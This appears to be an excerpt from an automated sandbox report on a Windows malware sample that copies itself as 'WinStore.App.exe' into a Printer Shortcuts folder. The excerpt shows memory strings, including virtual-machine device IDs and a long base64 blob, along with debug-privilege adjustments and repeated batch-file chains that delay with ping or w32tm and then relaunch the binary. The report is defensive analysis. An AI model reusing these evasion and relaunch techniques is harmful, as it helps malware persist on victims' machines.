Source: WinStore.App.exe, 00000011.00000002.2430632758.000000001B634000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
Source: WinStore.App.exe, 0000003A.00000002.3306289053.0000000003533000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 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
Source: 67VB5TS184.exe, 00000000.00000002.2071243229.000000000126A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: WinStore.App.exe, 00000011.00000002.2430632758.000000001B634000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: WinStore.App.exe, 00000026.00000002.2915572093.000000001BBB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: WinStore.App.exe, 0000001C.00000002.2654331036.000000001B952000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\RAGE#Vv5
Source: WinStore.App.exe, 00000030.00000002.3127795731.000000001AF30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
Source: WinStore.App.exe, 00000011.00000002.2417968978.0000000002E33000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 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 N
Source: WinStore.App.exe, 0000002B.00000002.3038773642.000000001B8E9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: WinStore.App.exe, 0000003A.00000002.3338337820.00000000135A8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
Source: WinStore.App.exe, 0000003A.00000002.3341972893.000000001BD20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(
Source: WinStore.App.exe, 00000021.00000002.2783241137.000000001B600000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlli
Source: WinStore.App.exe, 0000003A.00000002.3306289053.000000000352B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: +2y5hFqEu/PNSnucmB+yeEkmOquRGs6HR39hI9yV9majg5tGyWLorkGutqY27hRQA2HRqk9XIExmKMsNdTTdslIFGcvw83b49BKpNsGhgBOjS2Mxc5RNhbsiyZCTX2NviatuckXivc2+cKhxl4fhEDNzeFYMKE1NI+zseZotDnWEOz1JeJ9MV+osTHoC/f1Nfvi4MJRLRhoaAyHQQyiqVioLwpivf6ELxTo1Xzh5t64ry/WCLNfzJ9I9EXHKbQs2sESdBaaZCk2yFi0E+h+uGMQNydYHGLIGKQMsCGQgik4K+mGPVI/2wp4GjjDbBvIuAHLAMQz1mF4ZtgI5BsiGa6tHkL0jZB+MclcSnpWQkqUzmrTsDkNMGYO4xuw1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA"
Source: WinStore.App.exe, 0000001C.00000002.2631656200.0000000001258000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla
Source: w32tm.exe, 00000005.00000002.2123152273.0000013AB9139000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000015.00000002.2467831661.00000188EC559000.00000004.00000020.00020000.00000000.sdmp, WinStore.App.exe, 00000016.00000002.2520278011.000000001B2E0000.00000004.00000020.00020000.00000000.sdmp, WinStore.App.exe, 00000026.00000002.2915572093.000000001BC32000.00000004.00000020.00020000.00000000.sdmp, WinStore.App.exe, 0000002B.00000002.3038773642.000000001B820000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000002F.00000002.3060425410.0000019F6B159000.00000004.00000020.00020000.00000000.sdmp, WinStore.App.exe, 00000035.00000002.3216090363.0000000001078000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000039.00000002.3275289276.0000022D35F29000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: WinStore.App.exe, 0000000C.00000002.2297976498.000000001B280000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc
Source: WinStore.App.exe, 00000035.00000002.3220889959.0000000003133000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 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
Source: WinStore.App.exe, 00000011.00000002.2430632758.000000001B540000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllD

Source: C:\Users\user\Desktop\67VB5TS184.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\67VB5TS184.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\67VB5TS184.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\67VB5TS184.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\EtVpSBU0kW.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe "C:\Users\user\PrintHood\WinStore.App.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\rfQPUbaSjc.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe "C:\Users\user\PrintHood\WinStore.App.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lRXC83nrKa.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe "C:\Users\user\PrintHood\WinStore.App.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\wtO4vJVMF8.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe "C:\Users\user\PrintHood\WinStore.App.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zd3m5m79sA.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe "C:\Users\user\PrintHood\WinStore.App.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\HY3kVmQ00V.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe "C:\Users\user\PrintHood\WinStore.App.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2ucUGghGnf.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe "C:\Users\user\PrintHood\WinStore.App.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Q8sISb3ARb.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
